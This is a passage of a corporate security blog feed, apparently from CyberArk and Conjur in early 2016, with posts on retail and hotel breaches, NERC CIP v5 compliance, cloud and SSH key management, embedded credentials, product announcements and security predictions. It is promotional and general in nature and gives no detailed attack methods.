Wendy’s should be applauded for its quick reaction and handling of the potential breach. They hired cybersecurity experts immediately to investigate the issue, not wanting it to spiral too far out of control. Although their response plan seems stellar, their overall security clearly isn’t. Wendy’s was not aware of the potential breach in the first place, they were alerted by someone else. The security team needs to have a better system in place so they are made immediately aware of such suspiscous activity. Hopefully a revamp of their security protocols becomes part of their response plan as we learn more as to what actually happened. 

Although enough details haven’t been released about the breach to know exactly what happened, it is no secret that POS devices are attractive to hackers. Since they are meant to get sales done as quickly as possible, security isn’t always the top concern. Therefore, they can be relatively easy to hack. Restaurants are an attractive victim for hungry hackers, as they tend to store an abundance of information on their POS devices.

As if the 930 calories in the Baconator weren’t enough to deter your from the drive-through, maybe this will help you stick to your New Year’s resolution. Want to make your enterprise more secure in 2016? Check out our Secrets Management Checklist, and check security off of your to-do list.

 

]]>
Webinar: Learn How CyberArk Can Help Energy Companies Manage Risk and Meet NERC CIP v5 Recommendations https://www.cyberark.com/blog/webinar-learn-cyberark-can-help-energy-companies-manage-risk-meet-nerc-cip-v5-recommendations/ Fri, 29 Jan 2016 15:22:14 +0000 https://www.cyberark.com/blog//

Meeting regulations doesn’t necessarily equate to operating securely. It’s necessary to build security on top of requirements according to the level of risk. When it comes to protecting critical IT and OT systems, certain organizations have increased efforts to lead the way in developing and implementing regulations that help critical infrastructure companies to adopt a strong security posture.

The North American Electric Reliability Corporation, for example, has established the Critical Infrastructure Protection (CIP) program to improve the North American power systems’ security from physical and cyber threats. Specifically, NERC CIP v5 incorporates key requirements based on the National Institute of Standards and Technology (NIST) Risk Management Framework to help registered entities (utilities and other power facilities) achieve operations reliability excellence. This reliability in turn improves the cyber security posture for the Bulk-Power System (the grid).

Three key requirements of note:

  1. Registered Entities are now required to enforce authentication of interactive user access and to identify individuals who have authorized access to shared accounts. They also must implement strong passwords and change known default passwords per cyber asset capability. (CIP-007-5 R5 – Systems Security Management – Access Control)
  1. The use of an intermediate system is now required, so that cyber assets initiating interactive remote access do not directly access the applicable cyber asset within the Electronic Security Perimeter (ESP). Entities must also utilize encryption that terminates at the intermediate system and use multi-factor authentication for all interactive remote access sessions. (CIP-005-5 R2 Electronic Security Perimeter(s) – Interactive Remote Access Management)
  1. Entities must remove an individual’s interactive remote access within 24 hours of termination, and the removal of an individual’s access to the designated storage locations must be the end of the next calendar day after termination. (CIP-004-5.1 R5 – Personnel & Training – Access Revocation)

The North American Electric Reliability Corporation has recognized the key role that privileged accounts play in advanced external and internal cyber-attacks, especially as they enable users to initiate interactive remote access sessions to critical cyber assets. The NERC CIP v5 requirements on privileged account security ensure that entities have accountability for every use of privileged and shared accounts as well as secure remote access for external vendors with “over-the-shoulder” real time monitoring. Additionally, the standard has requirements related to privileged session isolation in order to keep credentials from being exposed, while securing privileged credentials in a tamper-proof vault.

Securing privileged accounts is not only critical in order to meet the NERC CIP v5 but it is also an effective way to reduce the risk of cyber-attacks. Privileged accounts are extremely useful for malicious actors as they allow access to critical assets and the opportunity to roam the system, and in many cases, undetected. Privileged session isolation and monitoring mitigates the risks associated with unauthorized users exploiting accounts that access critical systems. These measure also keep malware that could be present in the users’ end-point contained.

The NERC CIP v5 has raised the bar in the cyber security regulatory world by improving on many basic cyber “hygiene practices” that give organizations a strong starting point in their journey to implementing a holistic risk-based approach to securing critical assets. NERC CIP v5 standard enforcement begins on April 1, 2016.

Watch our recorded webinar (16 mins): CyberArk and NERC CIP v5 compliance to learn how you can meet all the privileged accounts related requirements.

]]>
DataInformed- How to Create Your Scalable Data Security Plan https://www.cyberark.com/blog/datainformed-how-to-create-your-scalable-data-security-plan/ Fri, 29 Jan 2016 17:04:00 +0000 https://cyberarkvx2.wpengine.com/blog/datainformed-how-to-create-your-scalable-data-security-plan/  

Our CEO, Elizabeth Lawler, had the opportunity to write a piece for DataInformed. In the post, Elizabeth discusses the true impact of data breaches and their seemingly never ending repercussions.  As data breaches are costly, and diminish a company’s reputation, taking preventative measures to mitigate risk seems like the best strategy.

Conjur CEO guest writes for DataInformedIn the piece, Elizabeth outlines 5 necessary steps for creating a scalable data security plan. These 5 initiatives are aimed at making the enterprise more secure without compromising speed an innovation. Security should be a crossdepartmental concern. By re-naming security as a company-wide item, and having open and honest conversations about the security agenda, you will be closer to meeting your compliance goals.

Elizabeth also discusses how important it is to understand that security is an interative process. Things are never perfect the first time, you must turn your efforts into a process, understanding what works and what doesn’t , making the plan better every single time.

Success metrics, RBAC, and audit are also discussed, Elizabeth outlining the way these things can help create a cohesive and extendable security plan that all internal stakeholders will get behind and implement.

Take a look at all of Elizabeth’s security advice here, and, as always, don’t forget to let us know what you think.

 

]]>
Gartner: Cloud Breaches are Almost Certainly The Customer’s Fault https://www.cyberark.com/blog/gartner-cloud-breaches-are-almost-certainly-the-customers-fault/ Thu, 28 Jan 2016 14:50:00 +0000 https://cyberarkvx2.wpengine.com/blog/gartner-cloud-breaches-are-almost-certainly-the-customers-fault/  

As more enterprises embrace AWS, the industry analyst firm sounds a note of caution: security and compliance is still your responsibility no matter how well the cloud service provider does the job of securing their infrastructure.

Gartner warns that cloud security failure is the customers faultIn what is a pretty eye-opening and cautionary prognostication, the industry analyst firm Gartner has warned that through 2020, 95% of cloud security failures will be the customer’s fault. What does this mean in practical terms for the growing number of risk-conscious organizations making Amazon Web Services an integral component of their IT services delivery strategy?

For many large organizations that still have substantial misgivings about the risks posed by cloud services, this prediction would seem counter-intuitive. Gartner, of course, is not suggesting that customers should simply assume the best of their cloud service provider, and “that using a cloud means that whatever they do within that cloud will necessarily be secure”.

Instead, Gartner is restating the fundamental challenge of the cloud’s shared responsibility model. But, the firm is pointing out, rather emphatically, that while cloud service providers have done a good job of holding up their bargain, customers are still coming to terms with the challenge that “secure use of public clouds requires explicit effort on the part of the cloud customer.”

Effectively speaking, the service provider is responsible for securing the infrastructure. How the infrastructure is used, and who – and what – gets access and permissions remains the customer’s responsibility. Without adequate controls in place, it’s far more likely that a security incident, breach, or compliance failure will be the customer’s fault rather than that of the service provider.

So what are the practical implications and the logical conclusions from the prediction, especially for AWS customers? What value can tools like AWS Identity and Access Management (IAM), or even Security Monkey for AWS provide for ensuring security and compliance? Gartner sounds another note of caution:

”The characteristics of the parts of the cloud stack under customer control can make cloud computing a highly efficient way for naive users to leverage poor practices, which can easily result in widespread security or compliance failures.

In other words, cloud service providers can only provide the tools.  The customers have to bring the policy.  

For AWS customers, access and authorization policy is in large part a question of who or what gets access to theAccess and Authorization Policy for AWS IAM AWS Management Console and how AWS IAM roles and rules are maintained to ensure consistency.  Just as in on-premise datacenters, who gets access to administrator accounts and their associated authorizations is a key security and compliance consideration.

For many Conjur customers, the first point of departure is ensuring that AWS IAM users, roles, and rules are based on existing policy logic and identity data stores (notably but not exclusively, Microsoft Active Directory). Synchronizing with existing data and policy stores ensures that AWS identities are not managed in a silo, and that when users leave or are de-provisioned, they don’t end up keeping their AWS credentials.

The next element is ensuring that access to the AWS Management Console and privileged systems running in AWS is via strong authentication and involves the use of private keys, including SSH keys. This type of deployment is commonly referred to as a SSH bastion host.  

However, a set of new challenges present themselves when customers go to the next series of steps. Securing access to the AWS Management console is complicated by the need to enable developer access for moving code intro production, for example, which can easily result in violating principles of least privilege. In this sense, AWS usage illustrates the need how to strike a balance between operational flexibility and security and compliance needs.

A closely related authorization challenge to developer access is how machine identities are managed in AWS environments. Machine identities, such as applications, services, and APIs also need to be managed in terms of permissions. In order to scale effectively as well as secure ephemeral infrastructure, a new approach is needed.  

Conjur is designed to effectively tackle these challenges – especially the management authorization for machine identities in highly dynamic environments.  

The Conjur platform directly addresses those elements that customers need to avoid becoming one of Gartner’s statistics:

  • Manage the complexity of IAM permissions and align cloud service provider tooling with internal policy and identity data sources  
  • Ensure consistent authorization policies are maintained for access to secrets based on role, with activity logged and audited
  • Enable developer access to AWS admin console while still adhering to least privilege access
  • Automate governance for ephemeral, short-lived machine identities Broker access and enforcing strong authentication for remote users to private instances and privileged systems running in AWS

 

]]>
Conjur Accelerates Adoption of Automated Infrastructure with New Software Release https://www.cyberark.com/blog/conjur-accelerates-adoption-of-automated-infrastructure-with-new-software-release/ Wed, 27 Jan 2016 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-accelerates-adoption-of-automated-infrastructure-with-new-software-release/  

Press Release:

Conjur Version 4.6 Delivers Identity, Authorization and Audit Capabilities for Enterprises that Require Compliance and Security While Enabling Greater Velocity

WALTHAM, Mass.– Jan. 27, 2016 – Conjur, Inc., provider of security orchestration software, has released significant product enhancements to assist highly regulated industries in their transition to the cloud. As enterprises migrate their infrastructure and application development to the cloud, the need for speed and security increases. Conjur Version 4.6 delivers meaningful improvements for its core security platform, including easy multi-region Amazon KMS integration, expiration of secrets and a new policy specification that delivers easier integration with machine-generation and policy workflows. These developments empower highly regulated enterprises to grow and scale their cloud-based, automated infrastructures while maintaining their security and compliance obligations.

“Conjur provides a flexible solution that allows customers to solve their security dilemmas without sacrificing velocity or productivity,” said Mitch Haile, Vice President of Products at Conjur. “Through a centralized authorization service exposed through APIs, Conjur enables enterprises to apply a consistent set of policies for production, staging and test environment access throughout the entire software development cycle. These latest enhancements meet the requirements for the scalable, enterprise-grade secret management solution for organizations in highly regulated industries.”

Conjur Version 4.6 enables enterprises to automate infrastructure securely by providing the following:

  • SSH jump server to control access to cloud infrastructure, including Amazon AWS, Microsoft Azure and others
  • Simplify and centrally manage security policies across complex AWS deployments, including multiple AWS accounts, availability zones and hybrid architectures
  • Cloud independent identity for jobs, containers and VMs
  • Enforce consistent policy across large organizations and scale security controls through a delegated administration model
  • Enterprise-grade secrets management eliminates secrets from source code and configuration files
  • Comprehensive audit and reporting integrates with third party systems of record

Conjur supports numerous platforms and tools including Puppet, Docker and Chef. Conjur Version 4.6 supports Red Hat Enterprise Linux, CentOS and Ubuntu for the host platform. The user interface includes new management features for secrets, hosts, LDAP integration and policy improvements.

Conjur 4.6 is available immediately by contacting Conjur at www.conjur.net.

About Conjur
For enterprises that need to protect their infrastructure, Conjur provides proactive security with comprehensive authorization for every cloud, VM, container, service, job and user. Conjur helps companies such as Netflix, Box, and Puppet Labs solve critical operational, compliance, and security challenges that originate in modern automated infrastructure. Headquartered in Waltham, Massachusetts, Conjur is funded by Avalon Partners and Amplify Partners. Visit www.conjur.net and follow @conjurinc on Twitter.

PRContact:
Tracy Wemett
BroadPR
+1-617-868-5031

All trademarks recognized.

 

]]>
3 Security Concerns All Financial Services Companies Should Address https://www.cyberark.com/blog/3-security-concerns-all-financial-services-companies-should-address/ Tue, 26 Jan 2016 19:29:00 +0000 https://cyberarkvx2.wpengine.com/blog/3-security-concerns-all-financial-services-companies-should-address/  

As enterprise IT teams grow, the threat surface for attacks increases.  As hackers are getting smarter in the way they access systems, businesses are quickly realizing that security is one of the most important, and potentially Security Concerns for Financial Services Companiesdevastating, challenges they face. It used to be that only security teams were concerned about cyber safety, however, recently, it has quickly become a priority on the c-suite agenda. After surveying 1,409 CEOs around the world,  found that 61%  are concerned about cybersecurity and 55% are troubled by consumers’ waning trust in businesses.

In its recently released Global State of Information Security Survey of 2016 PwC found that for financial service firms, cybersecurity is a chief concern. The piece discusses some of the key issues they face. Although some of the statistics on breaches seem scary, and all of the publicized hacks make us feel as though no one takes our private data seriously, this study shows that we are headed in the right direction. Enterprises are finally understanding that security cannot be an afterthought and seem to recognize where the vulnerabilities lie within their organizations. It is important that business leaders understand the way teams, internal processes, and external factors can potentially impact cybersecurity; in being aware of these things, a strategy can be created to help mitigate risk.

Here are 3 Security Concerns Financial Services Should Be Aware Of

    1. Most breaches occur within the organization

Of the surveyed companies, PwC found that 59% have an employee training and awareness program. As most breaches occur due to employee negligence, these new training programs are crucial in helping team members to understand and implement the appropriate security best practices. Knowing where vulnerabilities lie within the organization, and training teams to avoid them, is crucial to mitigating future risk.

    2. Third-party vendors are risky

Third-party vendors pose a security risk. Although these organizations likely set security standards of their own, they might not meet the rigorous ones that you set for your own organization. Additionally, it is very difficult to be sure they are actually following their security best practices. Just as a breach can occur within your organization due to employee negligence, breaches can also occur at third party vendors for the same reason.

3. Consumers are worried 

Keep Data Safe73% of consumers in the UK said they are worried about how data is being handled by the businesses that gather it. This statistic comes as no surprise as the news is bombarded with stories about the latest data hacks. Companies want to make money, and they cannot do so if customers continue to lose trust and take their business elsewhere. This monetary impact has led to a big change within organizations. 59% of those companies surveyed by PwC have a CISO that is in charge of security.  Having someone whose sole responsibility is to oversee, manage, and implement new security measures is a huge step in the right direction.

Thankfully, there are solutions that help make these concerns less scary and more approachable. The more sensitive information an organization holds, the bigger target they are. However, having security weaved into the organization, instead of serving as a bottleneck, will allow businesses to continue operating efficiently while keeping data safe.

 

 

]]>
Addressing Security Risks of Embedded Credentials https://www.cyberark.com/blog/addressing-security-risks-embedded-credentials/ Mon, 25 Jan 2016 18:38:33 +0000 https://www.cyberark.com/blog//

There’s an elephant in the room. A growing number of organizations proactively mitigate cyber security risks by improving privileged access controls, yet many still have powerful accounts across their environment for which the credentials have never been changed.  I’m referring to the commercial off-the-shelf (COTS) applications that often require the same access to privileged accounts as IT admin users. The privileged credentials accessed by applications are typically not well maintained, managed or secured. Awareness of the security risks associated with embedded credentials is growing.

Applications that use embedded credentials can be very attractive targets for adversaries. Often these applications require highest-level privileges to perform intended functions such as resetting a service, conducting a vulnerability scan or initiating a back-up. This means the accounts also have extensive access to sensitive systems and data.  The associated security risks can be great – especially when you consider that many organizations have thousands of embedded credentials across their environment, and each represents a potential pathway for attackers – increasing the magnitude of risk. As Jim Connelly, CISO of Lockheed Martin points out, “If [adversaries] get a hold of an over-privileged account, they’ll run through the environment like a brushfire.”

Dealing with credentials used by applications can be one of most challenging aspects of securing privileged accounts, since mitigation often involves refactoring a wide range of applications – from vulnerability management and IAM/governance tools to DevOps, data management and cloud tools. Quite a formidable task if automation mechanisms are not in place.

I admire about the way leading enterprise CISOs address such challenges. They don’t stick their heads in the sand, nor do they frame the issue as a binary, i.e. “We can’t do anything about this problem” or “There is only one right way to solve the problem.” As part of the CISO View industry initiative, CyberArk released research entitled, “The Balancing Act: The CISO View on Improving Privileged Access Controls” to provide a roadmap for companies to address security holistically – including overcoming the embedded credential conundrum. Within the report, 12 security leaders describe a meaningful range of options for dealing with embedded passwords in applications. Some methods require coding, some don’t. Some focus on prevention, others detection. Some use compensating controls.

There are also three baseline best practices that every organization should consider implementing initially to better protect credentials used by applications and scripts:

  1. The credentials for the account should be stored securely. If an application obtains an account’s credential from a configuration file, an attacker can easily read it. Instead, reconfigure applications to call the password from an encrypted password vault.
  2. The account password or SSH key should be changed regularly. Changing a credential used by applications is often a sensitive issue, especially if it has been used for so long that nobody knows what the effects of changing it will be. Weigh the value of changing a credential against the operational risk associated with changing it.
  3. The application should be designed using the principle of least privilege. For example, an application that performs backups should not need permissions to install software.

This kind of pragmatic problem solving is what you’ll find featured in the CISO View report. The report also highlights ways to make security more personal for stakeholders, such as IT administrators and DBAs, across your enterprise.  We’ll explore that topic further in another article. Download the full report.

]]>
Time to Check-Out…Hyatt Hotels Hacked https://www.cyberark.com/blog/time-to-check-out-hyatt-hotels-hacked/ Wed, 20 Jan 2016 16:33:00 +0000 https://cyberarkvx2.wpengine.com/blog/time-to-check-out-hyatt-hotels-hacked/  

There is nothing more relaxing than a few days away from home to sit back, relax, and unwind. If you decided to golf, hit the spa, or grab a bite to eat while enjoying some time off at a Hyatt Hotel, you might have taken more than just vacation selfies home with you. Just before Christmas, Hyatt announced a breach in their systems, though the details surrounding the hack were largely unclear. Now, weeks later, we are finally getting some answers… and it doesn’t look good.

According to Hyatt representatives, 250 hotels around the world were affected by the breach. Wondering if your holiday spot was hacked? Take a look at the comprehensive list.

The credit card information was largely taken between August 13, 2015 and December 8, 2015. A few accounts, however, were hacked right after July 30, 2015, so if you stayed at one of the breached hotels during that time, your information might have been exposed.

Malware designed to collect names, credit card numbers, expiration dates, and security codes was found in the hotels payment processing system. All of this information was leaked so it is important to take a look at your credit card reports for fraudulent charges. Even if you don’t see anything, it is a good idea to cancel the card and get a new one, as any hacker who has this info can easily make fraudulent online purchases on your credit card. Hyatt says that their restaurants were primarily targeted, but a few payment details from POS devices used at spas, golf courses, parking areas, and front desks were also exposed.

The exact number of customers affected has not been released, however, those whose information was taken will receive free credit monitoring for a year.

As most large retailers have made the switch to chip cards, it seems hackers are focusing on the easy targets. Since hotels process millions of transactions per day, it isn’t surprising that they are on most hackers’ radar. As these events become increasingly more common, let’s hope that this breach opens up deeper conversations among enterprises about data security, conversations that are ultimately aimed at changing security systems and protocols. In the meantime, we might be better off avoiding the fancy restaurants and golf courses and staying at a local B&B… or pitching a tent in our own backyard. 

 

]]>
Hindsight and Cyber Security Predictions for 2016 https://www.cyberark.com/blog/hindsight-cyber-security-predictions-2016/ Tue, 19 Jan 2016 14:57:50 +0000 https://www.cyberark.com/blog//

The arrival of the New Year provides a timely occasion for the security community to reflect upon the lessons learned over the past year and examine the challenges – and opportunities – ahead.

Compromised privileged accounts and credentials continued to be a popular pathway for attackers – the attack on the U.S. Office of Personnel Management is an example of one with extensive and ongoing fallout. The attack put privilege front and center – not only in the press, but also with the U.S. federal CIO, who issued the now-familiar “30 Day Sprint” that prioritized privileged account security, among other guidance.

What changed last year was a significant uptick in awareness – across IT and executive teams – around privileged account security. Our annual Threat Landscape survey found that 61 percent of respondents cited privileged account takeover as the most difficult stage of a cyber attack to mitigate, up from 44 percent from the year prior. Additionally, a 2015 retrospective article from Dark Reading explored 15 cyber security lessons that should have been learned in 2015. Among the lessons – the critical need for organizations to bolster privilege account management practices. Reporter Sara Peters wrote, “Study, after study, after study this year revealed that privileged accounts need to be better managed. It isn’t just that the credentials themselves are too weak, but sometimes they’re poorly monitored, too widely shared, and they’re not efficiently revoked when employees leave an organization.” We agree!

Looking Ahead

While we expect privileged account security to continue to be recognized as an enterprise security priority, there are a number of other trends to watch in the coming year. While not an exhaustive list, we expect these issues to get attention in the coming months.

  • Hitting Close to Home, Data Breaches Will Get Increasingly Personal. The recent VTech data breach highlights consumer privacy issues in a very powerful way. The breach exposed personal information, photos and chat logs of 6.4 million children – and prompted parents around the globe to take a hard look at the seemingly innocuous, Internet-connected toys their children have access to. Within weeks of the breach, headlines emerged revealing vulnerabilities in other popular children’s toys, including Hello Barbie and Hello Kitty. Despite this jarring wake-up call, an Altimeter Study indicates the vast majority (87 percent) of consumers still don’t even know what the term “Internet of Things” even means. This lack of awareness will need to change quickly. While consumers should properly educate themselves on the potential dangers of Internet-connected devices – from tablets to toys to smart thermostats – it is the responsibility of manufacturers to design with security in mind, and not put time-to-market ahead of protecting their customers. Manufacturers also need to put in place stronger controls for protecting the data that is collected from these devices and stored.
  • Cyber Criminals Will Get Even More Aggressive with Ransomware In Their Pursuit of High-Profile Financial Targets. According to an Infosecurity Magazine article, financial services firms are hit by security incidents 300 times more frequently than businesses in other industries. In 2015, the Federal Financial Institutions Examination Council (FFIEC) warned that cyber attacks against financial institutions to extort payment in return for the release of financial information and sensitive data are increasing. In the year ahead, these attacks will become more prevalent and aggressive, as motivated attackers find new ways to utilize ransomware to blackmail individuals and corporations. Not surprisingly, the attackers will follow the money, particularly targeting enterprise organizations that have the resources and are most likely able to pay the requested ransoms.
  • Lines Between Physical and Cyber Terrorism Will Blur. In 2015, devastating acts of terrorism impacted the global community. In 2016, we will increasingly see the convergence of physical and cyber terrorism aimed at wreaking far-reaching havoc. For example, as Reuters reported, a suspected attack on a Ukrainian power grid recently left parts of the country without energy. This attack represents one of the few publicly documented assaults on an industrial target. In late December 2015, the NSA issued a report “Seven Steps to Effectively Defend Industrial Controls Systems.” Within the introduction of that report, it’s noted that it’s not a matter of if industrial controls systems will have an intrusion, but when. Over the next 12 months, we expect to see more headlines of greater coordination between these two types of attacks – and more successful breaches that could negatively impact major health systems, financial markets and energy grids, among others.

What are you tracking in 2016? Share your thoughts on the cyber security landscape. On Twitter use @CyberArk with the hashtag #2016Predictions.

From all of us at CyberArk, we wish you a safe and secure New Year!

 

]]>
Elizabeth Lawler Participates in AllThingsITSM Podcast https://www.cyberark.com/blog/elizabeth-lawler-participates-in-allthingsitsm-podcast/ Wed, 13 Jan 2016 16:18:00 +0000 https://cyberarkvx2.wpengine.com/blog/elizabeth-lawler-participates-in-allthingsitsm-podcast/  

In a podcast for AllThingsITSM, our CEO, Elizabeth Lawler, spoke with Carlos Cassanova and Kirstie Magowan
Screen_Shot_2016-01-12_at_3.21.52_PM-163798-edited.pngabout cybsersecurity. In this short and informative session,  Elizabeth discusses the universal nature of cybersecurity, pointing out that data breaches have made security a part of daily life.

Elizabeth_2.jpgDuring the 20 minute conversation, Elizabeths talks about dealing with the increasing threat of databreaches. Whether a breach is caused by malicious actors or misadventures, there will always be errors in the system, so you want to minimize the impact of any one compromised event.

She also mentions that automated security is an improvement to humans trying to do security themselves, as it is the only real, consistent and reproducible solution.

As a woman in tech, Elizabeth chats about breaking through the glass ceiling in a male dominated industry and encourages employers to take proactive steps toward developing more diversified teams.

Sounds interesting, right? Check out the podcast and let us know what you think!

 

]]>
Top 5 Challenges Financial Services Face in Moving to the Cloud https://www.cyberark.com/blog/top-5-challenges-financial-services-face-in-moving-to-the-cloud/ Tue, 12 Jan 2016 15:40:00 +0000 https://cyberarkvx2.wpengine.com/blog/top-5-challenges-financial-services-face-in-moving-to-the-cloud/  

The transition from on prem to the cloud can feel like a cumbersome task. Often, the tools we used before don’t work and we worry about the security of data that is not longer stored on premise.  Despite the challenges we often face during the various stages of migration, it seems pretty apparent that the cloud is here to stay, as businesses who have made the shift are extremely happy with the end results.

The transformation, however, seems to plague some industries more than others; financial services being one of those fields. Financial services is one of the most highly regulated industries, having to adhere to strict security and compliance regulations. However, the desire to cut costs, move quickly, scale easily, and have data readily available means that migrating to the cloud is key to staying ahead of the competition. So, what are these problems and how can you solve them?

Here are the top 5 challenges and solutions for financial services moving to the cloud.

1. Compliance

Remaining compliant in a highly regulated industry is key. When moving to the cloud, it is crucial that the entire team is on the same page and completely understands what regulatory requirements they must meet.  Make sure that each stakeholder is part of this conversation and approach it as a group effort, rather than a burden on any one team.

2. Integrations

When making the shift to the cloud, you want to be able to continue using the tools you had before. Making sure these tools are properly secured in your new environment can be a challenge. So, how do you keep using the applications you love without compromising security? Find a solution that integrates with your current tool chain. This way, your team doesn’t have to waste time learning how to use new tools that they don’t like and can spend more time innovating with the systems they know and love.

3. Availability

With all of the new security measures and place, and internal changes happening in the organization, you want to make sure that secrets are readily available across all platforms so developers can continue to innovate quickly and efficiently. This highly available structure means quicker time to market, which is ideal for your financial institution.

4. Security

Since financial service organizations deal with highly sensitive data, and often have confidential internal processes, they need to be sure that the information they store in the cloud is safe. Therefore, it is key to give everything in your application and identity. Once you do this, create a well defined policy that all internal stakeholders can agree to. This policy should be dynamic, not static, so that it can be changed and improved as the organization shifts and grows. Prioritize which people and code, based on their role, have access to which secrets.

5. Audit/Reporting

Now that you have your defined policies and new security measures in place, you want to make sure you have a way of relaying that information to the people who need it. A well defined audit trail and easy to read user interface will ensure that, no matter what, you have the reports you need to show exactly what is happening in your infrastructure, in real time. With a clear UI, your entire team will be able to quickly and efficiently search for and create the reports they need, no having to waste precious development time hunting for the right security report.

Given the sensitive nature of the data accrued, financial institutions must adhere to some of the strictest regulations. For financial organizations that want to utilize all the benefits the cloud has to offer, including faster time to market, cheaper cost, and more optimized processes, understanding the 5 challenges and solutions outlined above is crucial to maintaining security while profiting from these advantages.

 

]]>
Time Warner Cable Suffers Data Breach https://www.cyberark.com/blog/time-warner-cable-suffers-data-breach/ Mon, 11 Jan 2016 18:30:00 +0000 https://cyberarkvx2.wpengine.com/blog/time-warner-cable-suffers-data-breach/  

If you’re like most people who use the same password for multiple accounts, you might want to re-think your strategy. Time Warner Cable (TWC) recently announced that the passwords for more than more than 320,000 customers’ email accounts had been hacked. This means that the information you put in your emails is also at risk. This is especially troubling if you tend to duplicate your passwords, as a hacker can easily try it out on a combination of things, having all the information they need to make fraudulent online purchases on your credit card  or access your personal bank information.

The FBI initially alerted TWC to the breach. Time Warner cable maintains that it is not at fault for the hack, stating that it was possibly caused “through data breaches of other companies that stored TWC customer information, including email addresses”.  The breach is likely to have only affected those in Time Warner’s Roadrunner service (email addresses ending in rr.com) however, all customers are urged to change their passwords as a precaution. In the wake of the hack, it is important to not only change these passwords but also those for all of your other accounts, as this information is typically sold on the dark web. 

As of now, the reason for how or why the breach occurred is mere speculation and new details are sure to emerge in the coming weeks. Regardless of whether the breach is the business’s fault directly, it is important for enterprises who suffer a breach to avoid deflecting blame. Leaders in the organization should commit themselves to reviewing the company’s internal security processes and ensure that all security measures are up to par and adequately protect the infrastructure. 

It is troubling that this breach, and similar breaches, are typically labeled as minor since only passwords and email addresses are exposed. It seems we have become so desensitized to these massive hacks, that unless our social security number is taken, we see the event as  insignificant. There is no longer an expectation of security and we are less outraged and more placid of breaches as each new one occurs.

Studies have found that three out of four people use duplicate passwords for multiple accounts. This makes the exposure of your email and password information even worse, since these same credentials can be used to login to a variety of different accounts. Since people do not react as strongly to these types of breaches, they often forget to change all of their passwords, accounts remaining vulnerable for months after they changed the one profile that was exposed. All enterprises must do a better job of securing information, no matter how minor the data may seem, and must be more proactive in ensuring that third party providers are adhering to strict security policies as well.

]]>
Analyst Report Names CyberArk the Overall Privilege Management Leader https://www.cyberark.com/blog/analyst-report-names-cyberark-the-overall-privilege-management-leader/ Fri, 08 Jan 2016 20:05:52 +0000 https://www.cyberark.com/blog//

For the second year in a row, analyst firm KuppingerCole has named CyberArk the “Overall Leader” in its Leadership Compass: Privilege Management 2015 report. This report helps organizations to make intelligent vendor choices as they proactively protect their businesses by securing privileged accounts from malicious attacks.

In the newly released report, KuppingerCole analysts Martin Kuppinger and Amar Singh explore the role of privileged account security in mitigating the risk of devastating cyber attacks, as well as managing emerging threats associated with enterprise mobile and cloud adoption. According to the report, “even the most sophisticated attacker would find it almost impossible to succeed without having access to privileged credentials.” Market awareness of this point is growing not only through our continued market education, but also via analyst reports that advocate for privileged account security to be on the top of the enterprise security priority list.

According to the report, privilege management “requires a robust policy and process framework but also technology that can support the policy requirements.” As such, truly mature Privilege Management solutions “go much further than simple password generation and access control to individual systems, but also provide a unified, robust and – importantly – transparent Privilege Management platform which is integrated into an organization’s overall Identity and Access Management (IAM) strategy.”

To identify the frontrunners in this market, the report analyzed 12 vendors across four key evaluation categories: Overall, Product, Market and Innovation. Based on in-depth analysis and a combined rating of product strength, market presence and innovation, CyberArk surpassed all other vendors and was named the Leader across each evaluation category. Dubbed the “Gold Standard” and the “one to beat in Privilege Management,” the CyberArk Privileged Account Security Solution was also recognized for its robust capabilities for threat analytics and alerts; session management and monitoring; account management; least privilege management; support for AWS and Microsoft Azure management consoles and large partner ecosystem.

We encourage you to read the full report, but here’s a quick sound bite from KuppingerCole founder and principal analyst Martin Kuppinger:

“In the increasingly complex cyber threat landscape, privileged account security has become a business imperative. With proven, innovative products and firm understanding of how to address customers’ most critical IT security challenges, we named CyberArk the Overall Leader in Privilege Management for the second year in a row. CyberArk should be included in every vendor evaluation and product selection process for Privilege Management.”

For an overview of the privilege management market, please download a complimentary copy of the full KuppingerCole report here.

]]>
Mitigate Cyber Security Risks with NIST Recommended Controls to Secure SSH https://www.cyberark.com/blog/mitigate-cyber-security-risks-with-nist-recommended-controls-to-secure-ssh/ Tue, 05 Jan 2016 18:25:46 +0000 https://www.cyberark.com/blog//

The Secure Shell (SSH) protocol has been used for well over a decade, but its use has typically flown under the radar of security teams. As a result, this protocol, which was initially designed to secure remote access between systems, has also had the unintended consequence of creating major security holes in mission critical assets. Recognizing the risks, NIST recently released an Internal Report that highlights the prevalence of SSH within the enterprise IT infrastructure, common vulnerabilities associated with SSH and recommended controls to better secure SSH and protect critical systems.

If you don’t typically work with Unix or Linux systems, it’s likely you’ve never knowingly used SSH. SSH is commonly used by interactive users to securely access remote Unix and Linux systems, and it is often used in secure file transfer processes and point-to-point tunneling to protect sensitive data transferred between systems. Given the nature of its use, most SSH-based access is privileged access. Yet, unlike privileged passwords, the SSH keys used to establish SSH connections are rarely protected, managed or even known.

“Because SSH is the primary secure access method used for administration and automated processes on mission critical systems, its security is crucial.” –NISTIR 7966

Because SSH has been commonly used for over a decade with little oversight, organizations can have hundreds of thousands of valid SSH keys with no insight into where these SSH keys live, what trusts exist between key pairs or who has access to the keys. Without any control over these keys, it can be easy for an attacker to compromise an SSH key and use it to gain persistent access to critical systems – without raising any red flags. Worse, when organizations take proactive steps to control password-based access to privileged accounts on Unix and Linux systems, SSH key-based access can be used to bypass these privileged account management controls. As a result, organizations can be left with an increased risk of attack using SSH keys and little, if any, ability to detect a key compromise.

To help organizations address these risks, NIST issued a series of recommended controls to better secure and manage SSH keys, and thus better protect critical systems from compromise. Because SSH keys provide privileged access to critical systems, NIST’s recommended controls for SSH keys are very similar to those for privileged passwords.

NIST recommended controls include:

  • Account Management to rotate, audit and control access to private SSH keys.
  • Access Enforcement to prevent users from granting themselves access to critical systems and privileged SSH keys.
  • Least Privilege to limit root access to only situations in which it is absolutely necessary.
  • Auditing and Monitoring to track who or what accessed a particular system using an SSH key.
  • Risk Assessment to discover and validate SSH-key based trust relationships between users and systems.
  • Identity and Authentication to associate SSH keys with individual users or systems and detect unauthorized SSH-key based access.

By following the controls recommended in NISTIR 7966 and applying the same level of security to both privileged passwords and privileged SSH keys, organizations can minimize privileged account risks across the enterprise and significantly reduce the likelihood of a successful attack.

Learn more about how CyberArk can help your organization to address NISTIR 7966 recommendations and about CyberArk’s solution to secure, rotate and control access to SSH keys.

]]>
